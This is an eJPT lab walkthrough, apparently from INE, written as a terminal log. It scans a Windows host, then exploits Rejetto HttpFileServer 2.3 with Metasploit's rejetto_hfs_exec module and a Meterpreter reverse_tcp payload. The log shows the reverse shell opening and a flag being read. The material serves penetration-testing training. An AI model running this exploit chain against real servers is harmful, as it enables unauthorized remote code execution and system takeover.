Lab Name: Windows: HTTP File Server
Platform: INE
Lab No: 26
Exam: eJPT (Jr. Penetartion Tester)
┌──(root㉿INE)-[~]
└─# ping -c 4 demo.ine.local
PING demo.ine.local (10.4.16.251) 56(84) bytes of data.
64 bytes from demo.ine.local (10.4.16.251): icmp_seq=1 ttl=125 time=10.2 ms
64 bytes from demo.ine.local (10.4.16.251): icmp_seq=2 ttl=125 time=9.18 ms
64 bytes from demo.ine.local (10.4.16.251): icmp_seq=3 ttl=125 time=9.17 ms
64 bytes from demo.ine.local (10.4.16.251): icmp_seq=4 ttl=125 time=9.05 ms
--- demo.ine.local ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3004ms
rtt min/avg/max/mdev = 9.052/9.391/10.160/0.446 ms
┌──(root㉿INE)-[~]
└─# nmap -sV -O demo.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 15:01 IST
Nmap scan report for demo.ine.local (10.4.16.251)
Host is up (0.0099s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=9/15%OT=80%CT=1%CU=32894%PV=Y%DS=3%DC=I%G=Y%TM=66E6
OS:A9A1%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=105%TI=I%CI=I%II=I%SS=S%
OS:TS=7)OPS(O1=M546NW8ST11%O2=M546NW8ST11%O3=M546NW8NNT11%O4=M546NW8ST11%O5
OS:=M546NW8ST11%O6=M546ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=
OS:2000)ECN(R=Y%DF=Y%T=7F%W=2000%O=M546NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=7F%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=7F%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF
OS:=Y%T=7F%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=7F%W=0%S=A%A=O%F=R%O=%
OS:RD=0%Q=)T5(R=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=7F%W
OS:=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
OS:U1(R=Y%DF=N%T=7F%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%D
OS:FI=N%T=7F%CD=Z)
Network Distance: 3 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.94 seconds
┌──(root㉿INE)-[~]
└─# msfconsole -q
msf6 > search hfs
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/git_client_command_exec 2014-12-18 excellent No Malicious Git and Mercurial HTTP Server For CVE-2014-9390
1 \_ target: Automatic . . . .
2 \_ target: Windows Powershell . . . .
3 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Interact with a module by name or index. For example info 3, use 3 or use exploit/windows/http/rejetto_hfs_exec
msf6 > use 3
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > show options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.50.4 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOST demo.ine.local
RHOST => demo.ine.local
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 10.10.50.4:4444
[*] Using URL: http://10.10.50.4:8080/gFYUJpFG
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /gFYUJpFG
[*] Sending stage (176198 bytes) to 10.4.16.251
[!] Tried to delete %TEMP%\KKrFKVwGur.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.50.4:4444 -> 10.4.16.251:49306) at 2024-09-15 15:04:20 +0530
[*] Server stopped.
meterpreter > sysinfo
Computer : WIN-OMCNBKR66MN
OS : Windows Server 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > shell
Process 1948 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\hfs>cd /
cd /
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is AEDF-99BD
Directory of C:\
09/14/2020 06:52 AM 32 flag.txt
09/15/2024 09:34 AM <DIR> hfs
08/22/2013 03:52 PM <DIR> PerfLogs
08/12/2020 04:13 AM <DIR> Program Files
09/05/2020 09:05 AM <DIR> Program Files (x86)
09/10/2020 09:50 AM <DIR> Users
09/15/2024 09:28 AM <DIR> Windows
1 File(s) 32 bytes
6 Dir(s) 9,114,701,824 bytes free
C:\>type flag.txt
type flag.txt
f74c8347798f4082daf4b4570dba094a